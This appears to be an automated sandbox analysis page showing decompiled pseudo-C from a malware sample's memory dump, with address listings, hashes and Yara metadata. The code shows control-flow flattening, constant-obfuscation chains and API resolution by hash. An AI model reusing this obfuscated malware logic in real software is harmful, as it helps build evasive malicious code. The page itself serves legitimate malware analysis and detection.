				_v396 = 0x89c34a;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xaa955d3e;
				_v396 = _v396 ^ 0xaa9cf099;
				_v316 = 0x54e1fb;
				_v316 = _v316 + 0xffff88b2;
				_v316 = _v316 ^ 0x0053b1cb;
				_v392 = 0xd67855;
				_v392 = _v392 + 0xd739;
				_v392 = _v392 * 0x34;
				_v392 = _v392 ^ 0x2bb8cf2c;
				_v512 = 0x9dc1ac;
				_v512 = _v512 | 0xff1b5e8c;
				_v512 = _v512 / _t601;
				_v512 = _v512 + 0xc237;
				_v512 = _v512 ^ 0x02115509;
				_v368 = 0xb0c27;
				_v368 = _v368 * 0x3a;
				_v368 = _v368 + 0x9417;
				_v368 = _v368 ^ 0x028ae81d;
				_v352 = 0x7ea940;
				_v352 = _v352 + 0xffff6a40;
				_v352 = _v352 | 0x1d7a7563;
				_v352 = _v352 ^ 0x1d74a207;
				_v340 = 0xd37cb9;
				_v340 = _v340 >> 5;
				_v340 = _v340 ^ 0x00021b7e;
				_v384 = 0xc54f7c;
				_v384 = _v384 | 0xe1c129a4;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0x7152788e;
				_v320 = 0xafdf9b;
				_v320 = _v320 | 0x588bef45;
				_v320 = _v320 ^ 0x58ad1127;
				_v508 = 0x7882a6;
				_v508 = _v508 ^ 0x5ae648f7;
				_t677 = 0x7e;
				_v508 = _v508 / _t677;
				_v508 = _v508 + 0xffff266f;
				_v508 = _v508 ^ 0x00b4570c;
				_v344 = 0x25ec7c;
				_t158 =  &_v344; // 0x25ec7c
				_t692 = 0x77;
				_v344 =  *_t158 * 0x48;
				_v344 = _v344 ^ 0x0aab681c;
				_v332 = 0xac456;
				_v332 = _v332 ^ 0x143b2d92;
				_v332 = _v332 ^ 0x1438ce6d;
				_v436 = 0x1dd68;
				_v436 = _v436 + 0x1e14;
				_v436 = _v436 / _t692;
				_v436 = _v436 ^ 0x000407e3;
				_v468 = 0x975814;
				_v468 = _v468 | 0x165c3dad;
				_v468 = _v468 >> 3;
				_v468 = _v468 + 0x9a99;
				_v468 = _v468 ^ 0x02d4af38;
				_v428 = 0xd1fa32;
				_v428 = _v428 + 0x34cd;
				_v428 = _v428 >> 0xa;
				_v428 = _v428 ^ 0x000c7c43;
				_v372 = 0xb93604;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 + 0x569f;
				_v372 = _v372 ^ 0x0001c97c;
				_v312 = 0xb8b780;
				_v312 = _v312 / _t601;
				_v312 = _v312 ^ 0x0009bb57;
				_v364 = 0xc6b8c5;
				_v364 = _v364 >> 4;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0x35c8234d;
				_v500 = 0x5d2db3;
				_v500 = _v500 | 0xa4ec7bca;
				_v500 = _v500 * 0x42;
				_v500 = _v500 + 0xffff6871;
				_v500 = _v500 ^ 0x8955fb09;
				_v492 = 0xf8ac1c;
				_v492 = _v492 + 0xd489;
				_v492 = _v492 | 0x938b5662;
				_v492 = _v492 << 6;
				_v492 = _v492 ^ 0xfef6fac0;
				_v356 = 0x80a8a7;
				_v356 = _v356 >> 3;
				_v356 = _v356 + 0xffff1aa9;
				_v356 = _v356 ^ 0x00023cc5;
				_v420 = 0x29f504;
				_v420 = _v420 ^ 0x96d25191;
				_v420 = _v420 << 0xa;
				_v420 = _v420 ^ 0xee96722c;
				_v476 = 0x6526e6;
				_t250 =  &_v476; // 0x6526e6
				_t602 = 9;
				_t678 = 0x5e;
				_v476 =  *_t250 * 0x65;
				_t252 =  &_v476; // 0x6526e6
				_v476 =  *_t252 * 0x5d;
				_v476 = _v476 + 0xffffa50d;
				_v476 = _v476 ^ 0x7f6d4504;
				_v304 = 0x6f90;
				_v304 = _v304 + 0xffffb625;
				_v304 = _v304 ^ 0x0000ce69;
				_v348 = 0xd48165;
				_v348 = _v348 * 0x4f;
				_v348 = _v348 + 0xa298;
				_v348 = _v348 ^ 0x41980148;
				_v412 = 0x7e685b;
				_t271 =  &_v412; // 0x7e685b
				_v412 =  *_t271 * 0x1d;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 ^ 0x000f1110;
				_v460 = 0xd80dae;
				_v460 = _v460 * 0x4a;
				_v460 = _v460 << 9;
				_v460 = _v460 >> 5;
				_v460 = _v460 ^ 0x073a202e;
				_v324 = 0x2acd4f;
				_v324 = _v324 ^ 0x1744d618;
				_v324 = _v324 ^ 0x1766082c;
				_v400 = 0xe6723b;
				_v400 = _v400 ^ 0x220d80d9;
				_v400 = _v400 ^ 0x0161a8c1;
				_v400 = _v400 ^ 0x238d1a3c;
				_v376 = 0xaaa6;
				_v376 = _v376 + 0xd31a;
				_v376 = _v376 + 0xfffff53b;
				_v376 = _v376 ^ 0x00079406;
				_v452 = 0xe6cc76;
				_v452 = _v452 ^ 0xa4c29e28;
				_v452 = _v452 / _t602;
				_v452 = _v452 ^ 0x123fe3c8;
				_v520 = 0x822cac;
				_v520 = _v520 / _t678;
				_v520 = _v520 << 4;
				_v520 = _v520 << 9;
				_v520 = _v520 ^ 0x2c5f9d39;
				_v440 = 0xafb195;
				_v440 = _v440 + 0xffff123a;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x0003dc41;
				_v448 = 0xdf86e4;
				_v448 = _v448 ^ 0xac60bb5d;
				_v448 = _v448 ^ 0x5238faed;
				_v448 = _v448 ^ 0xfe8be764;
				_v336 = 0x3e14c9;
				_v336 = _v336 << 7;
				_v336 = _v336 ^ 0x1f0fc953;
				_v496 = 0x4885f3;
				_v496 = _v496 * 0x25;
				_v496 = _v496 + 0x3aa8;
				_v496 = _v496 + 0xffff73aa;
				_v496 = _v496 ^ 0x0a7b30ee;
				_v480 = 0xca6b34;
				_v480 = _v480 >> 9;
				_v480 = _v480 + 0xfb6a;
				_v480 = _v480 / _t692;
				_v480 = _v480 ^ 0x000164ed;
				_v432 = 0xb19133;
				_t679 = 0x63;
				_t693 = _v296;
				_v432 = _v432 * 0x53;
				_v432 = _v432 >> 0x10;
				_v432 = _v432 ^ 0x00018cb4;
				_v328 = 0xdb466c;
				_t603 = _v296;
				_v328 = _v328 / _t679;
				_v328 = _v328 ^ 0x000e2190;
				_v488 = 0xd48740;
				_t680 = 0x44;
				_v488 = _v488 * 7;
				_v488 = _v488 * 0x66;
				_v488 = _v488 + 0x34f;
				_v488 = _v488 ^ 0x50c19e73;
				_v424 = 0xacfab2;
				_v424 = _v424 / _t680;
				_v424 = _v424 | 0xedf008b5;
				_v424 = _v424 ^ 0xedf22909;
				_v472 = 0x2e74a8;
				_v472 = _v472 * 0x3f;
				_v472 = _v472 ^ 0x6424471f;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 ^ 0x0009d0c0;
				_v416 = 0x7e19d4;
				_v416 = _v416 << 0xd;
				_v416 = _v416 + 0x1081;
				_v416 = _v416 ^ 0xc3344569;
				_v464 = 0xa74bb7;
				_v464 = _v464 >> 0xb;
				_v464 = _v464 + 0x9c4;
				_v464 = _v464 >> 6;
				_v464 = _v464 ^ 0x000976a8;
				while(1) {
					L1:
					_t551 = 0xf168e34;
					do {
						while(1) {
							L2:
							_t698 = _t686 - 0x7498ebf;
							if(_t698 > 0) {
								break;
							}
							if(_t698 == 0) {
								_push(_v496);
								_push(_v336);
								_push(_v448);
								_t580 = E002C7F1D(_v480, _t603, _v432, E002D8606(_v440, 0x2c1560, __eflags), _v328, _v292 - _t603, _v488);
								E002CA8B0(_v424, _t577, _v472);
								_t582 = _v296;
								 *_t582 = _t693;
								_t582[1] = _t603 + _t580 - _t693;
								goto L29;
							}
							if(_t686 == 0x488924) {
								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
								_push(_t610);
								_push(_t610);
								_t693 = E002C7FF2(_t682);
								__eflags = _t693;
								_t551 = 0xf168e34;
								_t610 = _v456;
								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
								continue;
							}
							if(_t686 == 0x123a276) {
								_push(_v468);
								_push(_v436);
								_t587 = E002DDCF7(_v332, 0x2c15c0, __eflags);
								_push( &_v256);
								_push(_t587);
								_push(_t682);
								_push(_v300);
								 *((intOrPtr*)(E002CA42D(0xab2a8d8a, 0x2b7)))();
								E002CA8B0(_v428, _t587, _v372);
								_t694 =  &(_t694[5]);
								_t686 = 0x488924;
								L12:
								_t610 = _v456;
								while(1) {
									L1:
									_t551 = 0xf168e34;
									goto L2;
								}
							}
							if(_t686 != 0x57ff6e7) {
								if(_t686 == 0x5f676f3) {
									_t598 = E002D0AE0(8, 1);
									_push(_v516);
									_t682 = _t598;
									_push( &_v288);
									_push(_t682);
									_push(9);
									E002C80E3(_v380, _v484);
									_t686 = 0x7f96e60;
									L11:
									_t694 =  &(_t694[6]);
									goto L12;
								} else {
									if(_t686 != 0x618a3a9) {
										goto L28;
									} else {
										_t686 = 0x5f676f3;
										continue;
									}
								}
								L30:
								return _t595;
							}
							_t682 = 0x4000;
							_push(_t610);
							_push(_t610);
							_t595 = E002C7FF2(0x4000);
							_v300 = _t595;
							__eflags = _t595;
							if(__eflags != 0) {
								_t686 = 0x123a276;
								goto L12;
							}
							goto L30;
						}
						__eflags = _t686 - 0x7f96e60;
						if(_t686 == 0x7f96e60) {
							_t554 = E002D0AE0(0x10, 4);
							_push(_v396);
							_t682 = _t554;
							_push( &_v128);
							_push(_t682);
							_push(0xb);
							E002C80E3(_v504, _v388);
							_t610 = _v456;
							_t694 =  &(_t694[6]);
							_t686 = 0x8d9b717;
							_t551 = 0xf168e34;
							goto L28;
						} else {
							__eflags = _t686 - 0x8d9b717;
							if(_t686 == 0x8d9b717) {
								_t687 =  &_v256;
								_t659 = E002D0AE0(0x10, 8);
								_t560 = _v308;
								__eflags = _t560 - _t659;
								if(_t560 < _t659) {
									_t675 = _t659 - _t560;
									_t683 = _t687;
									_t634 = _t675 >> 1;
									__eflags = _t634;
									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
									asm("adc ecx, ecx");
									_t687 = _t687 + _t675 * 2;
									memset(_t683 + _t634, _t566, 0);
									_t694 =  &(_t694[6]);
								}
								_t563 = E002D0AE0(0x10, 8);
								_push(_v384);
								_t682 = _t563;
								_push(_t687);
								_push(_t682);
								_push(0xb);
								E002C80E3(_v352, _v340);
								_t686 = 0x57ff6e7;
								goto L11;
							} else {
								__eflags = _t686 - 0xa9d081a;
								if(_t686 == 0xa9d081a) {
									E002CED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
									_t610 = _v456;
									_t694 =  &(_t694[3]);
									_t686 = 0x7498ebf;
									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
									goto L1;
								} else {
									__eflags = _t686 - 0xe639f63;
									if(_t686 == 0xe639f63) {
										E002D8519(_v416, _v464, _v300);
										return 0;
									}
									__eflags = _t686 - _t551;
									if(__eflags != 0) {
										goto L28;
									} else {
										_push(_v476);
										_push(_v420);
										_v292 = _t682 + _t693;
										_push(_v356);
										_t603 = E002DC0C1( &_v128, __eflags,  &_v288, E002D8606(_v492, 0x2c1610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
										E002CA8B0(_v400, _t572, _v376);
										_t694 =  &(_t694[0xd]);
										_t686 = 0xa9d081a;
										goto L12;
									}
								}
							}
						}
						goto L30;
						L28:
						__eflags = _t686 - 0x7bf1275;
					} while (__eflags != 0);
					L29:
					return _v300;
				}
			}






























































































                                                                                                                                    0x002df435
                                                                                                                                    0x002df43f
                                                                                                                                    0x002df446
                                                                                                                                    0x002df44a
                                                                                                                                    0x002df455
                                                                                                                                    0x002df460
                                                                                                                                    0x002df46b
                                                                                                                                    0x002df473
                                                                                                                                    0x002df47b
                                                                                                                                    0x002df483
                                                                                                                                    0x002df48b
                                                                                                                                    0x002df496
                                                                                                                                    0x002df49e
                                                                                                                                    0x002df4a9
                                                                                                                                    0x002df4b4
                                                                                                                                    0x002df4bf
                                                                                                                                    0x002df4ca
                                                                                                                                    0x002df4d2
                                                                                                                                    0x002df4dd
                                                                                                                                    0x002df4e5
                                                                                                                                    0x002df4ed
                                                                                                                                    0x002df4f5
                                                                                                                                    0x002df4fd
                                                                                                                                    0x002df505
                                                                                                                                    0x002df50d
                                                                                                                                    0x002df512
                                                                                                                                    0x002df51e
                                                                                                                                    0x002df527
                                                                                                                                    0x002df52c
                                                                                                                                    0x002df532
                                                                                                                                    0x002df53a
                                                                                                                                    0x002df545
                                                                                                                                    0x002df550
                                                                                                                                    0x002df55b
                                                                                                                                    0x002df566
                                                                                                                                    0x002df571
                                                                                                                                    0x002df57c
                                                                                                                                    0x002df587
                                                                                                                                    0x002df592
                                                                                                                                    0x002df59a
                                                                                                                                    0x002df59f
                                                                                                                                    0x002df5a4
                                                                                                                                    0x002df5ac
                                                                                                                                    0x002df5b4
                                                                                                                                    0x002df5bf
                                                                                                                                    0x002df5c7
                                                                                                                                    0x002df5c8
                                                                                                                                    0x002df5cf
                                                                                                                                    0x002df5da
                                                                                                                                    0x002df5e5
                                                                                                                                    0x002df5f0
                                                                                                                                    0x002df5f8
                                                                                                                                    0x002df603
                                                                                                                                    0x002df60e
                                                                                                                                    0x002df619
                                                                                                                                    0x002df624
                                                                                                                                    0x002df62f
                                                                                                                                    0x002df63a
                                                                                                                                    0x002df64d
                                                                                                                                    0x002df654
                                                                                                                                    0x002df65f
                                                                                                                                    0x002df667
                                                                                                                                    0x002df675
                                                                                                                                    0x002df679
                                                                                                                                    0x002df681
                                                                                                                                    0x002df689
                                                                                                                                    0x002df69c
                                                                                                                                    0x002df6a3
                                                                                                                                    0x002df6ae
                                                                                                                                    0x002df6bb
                                                                                                                                    0x002df6c6
                                                                                                                                    0x002df6d1
                                                                                                                                    0x002df6dc
                                                                                                                                    0x002df6e7
                                                                                                                                    0x002df6f2
                                                                                                                                    0x002df6fa
                                                                                                                                    0x002df705
                                                                                                                                    0x002df710
                                                                                                                                    0x002df71b
                                                                                                                                    0x002df723
                                                                                                                                    0x002df72e
                                                                                                                                    0x002df739
                                                                                                                                    0x002df744
                                                                                                                                    0x002df74f
                                                                                                                                    0x002df757
                                                                                                                                    0x002df765
                                                                                                                                    0x002df76a
                                                                                                                                    0x002df76e
                                                                                                                                    0x002df776
                                                                                                                                    0x002df77e
                                                                                                                                    0x002df789
                                                                                                                                    0x002df793
                                                                                                                                    0x002df794
                                                                                                                                    0x002df79b
                                                                                                                                    0x002df7a6
                                                                                                                                    0x002df7b1
                                                                                                                                    0x002df7bc
                                                                                                                                    0x002df7c7
                                                                                                                                    0x002df7cf
                                                                                                                                    0x002df7df
                                                                                                                                    0x002df7e3
                                                                                                                                    0x002df7eb
                                                                                                                                    0x002df7f3
                                                                                                                                    0x002df7fb
                                                                                                                                    0x002df800
                                                                                                                                    0x002df808
                                                                                                                                    0x002df810
                                                                                                                                    0x002df818
                                                                                                                                    0x002df820
                                                                                                                                    0x002df825
                                                                                                                                    0x002df82d
                                                                                                                                    0x002df838
                                                                                                                                    0x002df840
                                                                                                                                    0x002df84b
                                                                                                                                    0x002df856
                                                                                                                                    0x002df86a
                                                                                                                                    0x002df871
                                                                                                                                    0x002df87c
                                                                                                                                    0x002df887
                                                                                                                                    0x002df88f
                                                                                                                                    0x002df897
                                                                                                                                    0x002df8a2
                                                                                                                                    0x002df8aa
                                                                                                                                    0x002df8b7
                                                                                                                                    0x002df8bb
                                                                                                                                    0x002df8c3
                                                                                                                                    0x002df8cb
                                                                                                                                    0x002df8d3
                                                                                                                                    0x002df8db
                                                                                                                                    0x002df8e3
                                                                                                                                    0x002df8e8
                                                                                                                                    0x002df8f0
                                                                                                                                    0x002df8fb
                                                                                                                                    0x002df903
                                                                                                                                    0x002df90e
                                                                                                                                    0x002df919
                                                                                                                                    0x002df921
                                                                                                                                    0x002df929
                                                                                                                                    0x002df930
                                                                                                                                    0x002df938
                                                                                                                                    0x002df940
                                                                                                                                    0x002df947
                                                                                                                                    0x002df94a
                                                                                                                                    0x002df94b
                                                                                                                                    0x002df94f
                                                                                                                                    0x002df954
                                                                                                                                    0x002df958
                                                                                                                                    0x002df960
                                                                                                                                    0x002df968
                                                                                                                                    0x002df973
                                                                                                                                    0x002df97e
                                                                                                                                    0x002df989
                                                                                                                                    0x002df99c
                                                                                                                                    0x002df9a3
                                                                                                                                    0x002df9ae
                                                                                                                                    0x002df9b9
                                                                                                                                    0x002df9c1
                                                                                                                                    0x002df9c6
                                                                                                                                    0x002df9ca
                                                                                                                                    0x002df9cf
                                                                                                                                    0x002df9d7
                                                                                                                                    0x002df9e4
                                                                                                                                    0x002df9e8
                                                                                                                                    0x002df9ed
                                                                                                                                    0x002df9f2
                                                                                                                                    0x002df9fa
                                                                                                                                    0x002dfa05
                                                                                                                                    0x002dfa10
                                                                                                                                    0x002dfa1b
                                                                                                                                    0x002dfa26
                                                                                                                                    0x002dfa31
                                                                                                                                    0x002dfa3c
                                                                                                                                    0x002dfa47
                                                                                                                                    0x002dfa52
                                                                                                                                    0x002dfa5d
                                                                                                                                    0x002dfa68
                                                                                                                                    0x002dfa73
                                                                                                                                    0x002dfa7b
                                                                                                                                    0x002dfa8b
                                                                                                                                    0x002dfa8f
                                                                                                                                    0x002dfa97
                                                                                                                                    0x002dfaa7
                                                                                                                                    0x002dfaab
                                                                                                                                    0x002dfab0
                                                                                                                                    0x002dfab5
                                                                                                                                    0x002dfabd
                                                                                                                                    0x002dfac5
                                                                                                                                    0x002dfacd
                                                                                                                                    0x002dfad2
                                                                                                                                    0x002dfada
                                                                                                                                    0x002dfae2
                                                                                                                                    0x002dfaea
                                                                                                                                    0x002dfaf2
                                                                                                                                    0x002dfafa
                                                                                                                                    0x002dfb05
                                                                                                                                    0x002dfb0d
                                                                                                                                    0x002dfb18
                                                                                                                                    0x002dfb25
                                                                                                                                    0x002dfb29
                                                                                                                                    0x002dfb31
                                                                                                                                    0x002dfb39
                                                                                                                                    0x002dfb41
                                                                                                                                    0x002dfb49
                                                                                                                                    0x002dfb4e
                                                                                                                                    0x002dfb5c
                                                                                                                                    0x002dfb62
                                                                                                                                    0x002dfb6a
                                                                                                                                    0x002dfb79
                                                                                                                                    0x002dfb7c
                                                                                                                                    0x002dfb83
                                                                                                                                    0x002dfb87
                                                                                                                                    0x002dfb8c
                                                                                                                                    0x002dfb94
                                                                                                                                    0x002dfbaa
                                                                                                                                    0x002dfbb1
                                                                                                                                    0x002dfbb8
                                                                                                                                    0x002dfbc3
                                                                                                                                    0x002dfbd0
                                                                                                                                    0x002dfbd1
                                                                                                                                    0x002dfbda
                                                                                                                                    0x002dfbde
                                                                                                                                    0x002dfbe6
                                                                                                                                    0x002dfbee
                                                                                                                                    0x002dfc03
                                                                                                                                    0x002dfc07
                                                                                                                                    0x002dfc0f
                                                                                                                                    0x002dfc17
                                                                                                                                    0x002dfc24
                                                                                                                                    0x002dfc28
                                                                                                                                    0x002dfc30
                                                                                                                                    0x002dfc35
                                                                                                                                    0x002dfc3d
                                                                                                                                    0x002dfc45
                                                                                                                                    0x002dfc4a
                                                                                                                                    0x002dfc52
                                                                                                                                    0x002dfc5a
                                                                                                                                    0x002dfc62
                                                                                                                                    0x002dfc67
                                                                                                                                    0x002dfc6f
                                                                                                                                    0x002dfc74
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc81
                                                                                                                                    0x002dfc81
                                                                                                                                    0x002dfc81
                                                                                                                                    0x002dfc81
                                                                                                                                    0x002dfc87
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfc8d
                                                                                                                                    0x002dffc3
                                                                                                                                    0x002dffcc
                                                                                                                                    0x002dffd3
                                                                                                                                    0x002e000b
                                                                                                                                    0x002e001f
                                                                                                                                    0x002e0024
                                                                                                                                    0x002e0030
                                                                                                                                    0x002e0032
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0032
                                                                                                                                    0x002dfc99
                                                                                                                                    0x002dfdb2
                                                                                                                                    0x002dfdc5
                                                                                                                                    0x002dfdc6
                                                                                                                                    0x002dfdcc
                                                                                                                                    0x002dfdd4
                                                                                                                                    0x002dfdd6
                                                                                                                                    0x002dfddc
                                                                                                                                    0x002dfde0
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfde0
                                                                                                                                    0x002dfca5
                                                                                                                                    0x002dfd4c
                                                                                                                                    0x002dfd55
                                                                                                                                    0x002dfd60
                                                                                                                                    0x002dfd75
                                                                                                                                    0x002dfd76
                                                                                                                                    0x002dfd77
                                                                                                                                    0x002dfd78
                                                                                                                                    0x002dfd8a
                                                                                                                                    0x002dfd9c
                                                                                                                                    0x002dfda1
                                                                                                                                    0x002dfda4
                                                                                                                                    0x002dfd0b
                                                                                                                                    0x002dfd0b
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfcb1
                                                                                                                                    0x002dfcb9
                                                                                                                                    0x002dfcdd
                                                                                                                                    0x002dfce2
                                                                                                                                    0x002dfcea
                                                                                                                                    0x002dfcfa
                                                                                                                                    0x002dfcfb
                                                                                                                                    0x002dfcfc
                                                                                                                                    0x002dfcfe
                                                                                                                                    0x002dfd03
                                                                                                                                    0x002dfd08
                                                                                                                                    0x002dfd08
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfcbb
                                                                                                                                    0x002dfcc1
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfcc7
                                                                                                                                    0x002dfcc7
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfcc7
                                                                                                                                    0x002dfcc1
                                                                                                                                    0x002dffc2
                                                                                                                                    0x002dffc2
                                                                                                                                    0x002dffc2
                                                                                                                                    0x002dfd1b
                                                                                                                                    0x002dfd2d
                                                                                                                                    0x002dfd2e
                                                                                                                                    0x002dfd2f
                                                                                                                                    0x002dfd34
                                                                                                                                    0x002dfd3d
                                                                                                                                    0x002dfd3f
                                                                                                                                    0x002dfd45
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfd45
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfd3f
                                                                                                                                    0x002dfde8
                                                                                                                                    0x002dfdee
                                                                                                                                    0x002dff6b
                                                                                                                                    0x002dff70
                                                                                                                                    0x002dff7e
                                                                                                                                    0x002dff8b
                                                                                                                                    0x002dff8c
                                                                                                                                    0x002dff8d
                                                                                                                                    0x002dff8f
                                                                                                                                    0x002dff94
                                                                                                                                    0x002dff98
                                                                                                                                    0x002dff9b
                                                                                                                                    0x002dffa0
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfdf4
                                                                                                                                    0x002dfdf4
                                                                                                                                    0x002dfdfa
                                                                                                                                    0x002dfede
                                                                                                                                    0x002dfef5
                                                                                                                                    0x002dfef7
                                                                                                                                    0x002dff00
                                                                                                                                    0x002dff02
                                                                                                                                    0x002dff04
                                                                                                                                    0x002dff06
                                                                                                                                    0x002dff0f
                                                                                                                                    0x002dff0f
                                                                                                                                    0x002dff11
                                                                                                                                    0x002dff13
                                                                                                                                    0x002dff15
                                                                                                                                    0x002dff18
                                                                                                                                    0x002dff18
                                                                                                                                    0x002dff18
                                                                                                                                    0x002dff2a
                                                                                                                                    0x002dff2f
                                                                                                                                    0x002dff3d
                                                                                                                                    0x002dff46
                                                                                                                                    0x002dff47
                                                                                                                                    0x002dff48
                                                                                                                                    0x002dff4a
                                                                                                                                    0x002dff4f
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfe00
                                                                                                                                    0x002dfe00
                                                                                                                                    0x002dfe06
                                                                                                                                    0x002dfebe
                                                                                                                                    0x002dfec3
                                                                                                                                    0x002dfec7
                                                                                                                                    0x002dfeca
                                                                                                                                    0x002dfecf
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfe0c
                                                                                                                                    0x002dfe0c
                                                                                                                                    0x002dfe12
                                                                                                                                    0x002e0049
                                                                                                                                    0x00000000
                                                                                                                                    0x002e004f
                                                                                                                                    0x002dfe18
                                                                                                                                    0x002dfe1a
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfe20
                                                                                                                                    0x002dfe20
                                                                                                                                    0x002dfe2c
                                                                                                                                    0x002dfe30
                                                                                                                                    0x002dfe37
                                                                                                                                    0x002dfe9a
                                                                                                                                    0x002dfe9d
                                                                                                                                    0x002dfea2
                                                                                                                                    0x002dfea5
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfea5
                                                                                                                                    0x002dfe1a
                                                                                                                                    0x002dfe06
                                                                                                                                    0x002dfdfa
                                                                                                                                    0x00000000
                                                                                                                                    0x002dffa5
                                                                                                                                    0x002dffa5
                                                                                                                                    0x002dffa5
                                                                                                                                    0x002dffb1
                                                                                                                                    0x00000000
                                                                                                                                    0x002dffb1

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                                    • API String ID: 0-2624470838
                                                                                                                                    • Opcode ID: bd8a88468cf92ce3861dc5f7afff0580ffadab2071d40ce31edf980b112aa763
                                                                                                                                    • Instruction ID: 63513d6c32ed8c89f468583e89b99ee87d76b8f8ee21ac63dc4ec8f2a3ccd5de
                                                                                                                                    • Opcode Fuzzy Hash: bd8a88468cf92ce3861dc5f7afff0580ffadab2071d40ce31edf980b112aa763
                                                                                                                                    • Instruction Fuzzy Hash: 4E5231715093819FD3B8CF25C58AB8BFBE1BBC5358F10891EE19A96260D7B48949CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CD6D8 Relevance: 9.2, Strings: 7, Instructions: 408COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002CD6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				intOrPtr _t400;
				void* _t407;
				signed int _t410;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				intOrPtr _t434;
				void* _t473;
				intOrPtr* _t482;
				signed int _t485;
				signed int* _t491;
				void* _t493;

				_push(_a16);
				_push(_a12);
				_v16 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002D20B9(__edx);
				_v72 = 0xfd05e7;
				_t491 =  &(( &_v192)[6]);
				_v72 = _v72 | 0xfdc7c414;
				_v72 = _v72 ^ 0xfdffc5f6;
				_t489 = 0;
				_v128 = 0x159cf;
				_t421 = 0;
				_v128 = _v128 + 0x2543;
				_t485 = 0x8939926;
				_v128 = _v128 ^ 0xc1c453fb;
				_v128 = _v128 ^ 0xc1c52ce8;
				_v188 = 0xc0a375;
				_t423 = 0x5a;
				_v188 = _v188 / _t423;
				_v188 = _v188 + 0xf5e3;
				_v188 = _v188 + 0xffffba7d;
				_v188 = _v188 ^ 0x0002d452;
				_v192 = 0xeb0e91;
				_v192 = _v192 << 0xb;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 | 0x4be38997;
				_v192 = _v192 ^ 0x4be25280;
				_v52 = 0x3397e5;
				_v52 = _v52 ^ 0x345a01ed;
				_v52 = _v52 ^ 0x346a35aa;
				_v60 = 0x140ff9;
				_t424 = 6;
				_v60 = _v60 / _t424;
				_v60 = _v60 ^ 0x000ad59a;
				_v168 = 0x6059cb;
				_t425 = 0x1a;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 / _t425;
				_v168 = _v168 * 0x21;
				_v168 = _v168 ^ 0x3ca5e455;
				_v112 = 0x1e6ccd;
				_v112 = _v112 << 0xc;
				_v112 = _v112 + 0xffff3925;
				_v112 = _v112 ^ 0xe6c2746b;
				_v44 = 0xb8d15a;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x0008fc1e;
				_v172 = 0x2478d;
				_v172 = _v172 ^ 0x68bbc6f8;
				_v172 = _v172 >> 0xc;
				_v172 = _v172 | 0x6f66efc5;
				_v172 = _v172 ^ 0x6f64ef75;
